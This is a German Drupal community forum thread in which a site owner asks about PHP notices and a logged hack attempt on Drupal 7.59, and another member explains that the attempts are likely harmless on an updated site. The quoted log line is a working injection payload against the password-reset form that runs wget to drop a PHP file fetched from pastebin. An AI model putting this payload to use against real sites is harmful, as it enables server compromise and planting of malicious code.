Startseite
  • » Home
  • » Handbuch & FAQ
  • » Forum
  • » Übersetzungsserver
  • » Suche
Startseite › Forum › Drupalcenter.de › Allgemeines zu Drupal ›

[gelöst] Notices warnings und hack attempt in Drupal 7.59

Eingetragen von Jenna (1883)
am 30.05.2018 - 21:49 Uhr in
  • Allgemeines zu Drupal
  • Drupal 7.x oder neuer

Ich habe seit einigen Tagen in den Protokollberichten einige dieser Warnungen, die mit PHP angezeigt werden oder Zugriff verweigert.

https://www.drupal.org/project/drupal/issues/2975433

Zitat:

Notice: Undefined index: #prefix in file_ajax_upload() (line 287 of /var/www/html/modules/file/file.module)

, plus 3 - 4 weitere Meldungen, die sich auf ajax beziehen

und

https://www.drupal.org/forum/support/post-installation/2018-04-24/hack-a...

Zitat:

https://www.example.com/?q=user/password&name[%23post_render][]=exec&name[%23markup]=wget+-O+misc%2fAuthCommon.php+https%3a%2f%2fpastebin.com%2fraw%2fmibqDZX4&name[%23type]=markup

Kann jemand helfen, ich werde aus den Issues nicht schlau ob man was unternehmen muß? Was genau steht da soll man tun?
Module und Core sind natürlich auf neuestem Stand.

Ich kann keine Veränderung in den FTP Dateien feststellen, auch sonst läuft die Seite normal, trotzdem nervt das.

Die IP's zu diesen Zugriffen habe ich umgehend gesperrt.

Ja, liebe DSGVO... genau für so etwas braucht man Zugriff auf die IP, um die Sicherheit der Seite zu erhalten und das werde ich auch mit "Sicherheit" nicht ändern...

Grüße Jenna

‹ Fatal error: Allowed memory size - nach Umzug bei gleichem Provider [gelöst] Notices warnings und hack attempt in Drupal 7.59 ›
  • Anmelden oder Registrieren um Kommentare zu schreiben

Wie ich es verstehe, soll man

Eingetragen von eigentor (1424)
am 30.05.2018 - 22:09 Uhr

Wie ich es verstehe, soll man überhaupt nichts tun.
Man teilt in den Issues mehr die Info, dass es sich um Hack-Versuche handelt.
Die Versuche waren wahrscheinlich erfolglos, wenn du rechtzeitig upgedatet hattest.

In dem einen Issue meint ja einer, sollte man lieber die Notices ausblenden, weil das das Log zuspammt.
Vermutlich wirst du aktuell selber ein Modul schreiben müssen, wenn du die Sachen nicht geloggt haben willst.
Ich persönlich würde lieber den Spam akzeptieren und merken, dass jemand mich zu hacken versucht.
Ich habe immer so viel Error Spam durch aus Faulheit nicht gefixte Fehler in meinem eigenen Code, dass das den Braten auch nicht mehr fett macht...

  • Anmelden oder Registrieren um Kommentare zu schreiben

Die Meldungen sind rapide

Eingetragen von Jenna (1883)
am 10.07.2018 - 17:20 Uhr

Die Meldungen sind rapide zurück gegangen, da ich die IPs händisch sperre.. nur ganz vereinzelt taucht noch mal so ein Versuch auf.
Ich halte auch nichts davon Notices auszublenden, lieber etwas Handarbeit und man hat langfristig Ruhe..

Vielen Dank für deine Info (Updates hatte ich natürlich auch durchgeführt)

Grüße Jenna

  • Anmelden oder Registrieren um Kommentare zu schreiben

Benutzeranmeldung

  • Registrieren
  • Neues Passwort anfordern

Aktive Forenthemen

  • Drupal CMS installieren
  • [erledigt]MP3 in Drupal 10 einbinden
  • (gelöst)Drupal 11 installieren
  • Titel ausblenden
  • Ich brauche dringen Hilfe zu Updates oder ggf. wwie geht Composer?
  • Dynamische Ansicht von Seiteninhalt (als Tabelle?)
  • Vergabe von Berechtigungen für bestimmte Rollen; mir fehlt der Haken bzw. das „Veröffentlicht“
  • Medien und andere Daten mit Feeds von Drupal 7 auf Drupal 10 migrieren
  • Rolle erstellen nicht zu finden
  • für drupal11 ein Slider Modul
  • [gelöst] W3CSS Paragraphs Views
  • Drupal 11 neu aufsetzen und Bereiche aus 10 importieren
Weiter

Neue Kommentare

  • Verwende doch das Tag dafür,
    vor 3 Tagen 2 Stunden
  • Guckst du hier: step by step
    vor 2 Tagen 16 Stunden
  • Guckst du hier: step by step
    vor 2 Tagen 16 Stunden
  • Ich habe ja keine Angst vor
    vor 1 Woche 5 Tagen
  • Ist grundsätzlichmachbar – aber nichts für „einfach mal schnell“
    vor 2 Wochen 8 Stunden
  • Vielen Dank erst einmal, aber
    vor 2 Wochen 2 Tagen
  • Du hast die "Trusted host
    vor 2 Wochen 2 Tagen
  • Bitte genauer den aktuellen Lösungs-Ansatz beschreiben
    vor 4 Wochen 1 Tag
  • Git und rsync sind die wichtigsten Werkzeuge
    vor 4 Wochen 4 Tagen
  • Arrrrg. Nix Tabelle :-D /*
    vor 8 Wochen 6 Tagen

Statistik

Beiträge im Forum: 250284
Registrierte User: 20498

Neue User:

  • Inga GuAph
  • Robertolix
  • DavidBit

» Alle User anzeigen

User nach Punkten sortiert:
wla9464
stBorchert6003
quiptime4972
Tobias Bähr4019
bv3924
ronald3857
md3717
Thoor3678
Alexander Langer3416
Exterior2903
» User nach Punkten
Zur Zeit sind 0 User und 19 Gäste online.

Hauptmenü

  • » Home
  • » Handbuch & FAQ
  • » Forum
  • » Übersetzungsserver
  • » Suche

Quicklinks I

  • Infos
  • Drupal Showcase
  • Installation
  • Update
  • Forum
  • Team
  • Verhaltensregeln

Quicklinks II

  • Drupal Jobs
  • FAQ
  • Drupal-Kochbuch
  • Best Practice - Drupal Sites - Guidelines
  • Drupal How To's

Quicklinks III

  • Tipps & Tricks
  • Drupal Theme System
  • Theme Handbuch
  • Leitfaden zur Entwicklung von Modulen

RSS & Twitter

  • Drupal Planet deutsch
  • RSS Feed News
  • RSS Feed Planet
  • Twitter Drupalcenter
Drupalcenter Team | Impressum & Datenschutz | Kontakt
Angetrieben von Drupal | Drupal is a registered trademark of Dries Buytaert.
Drupal Initiative - Drupal Association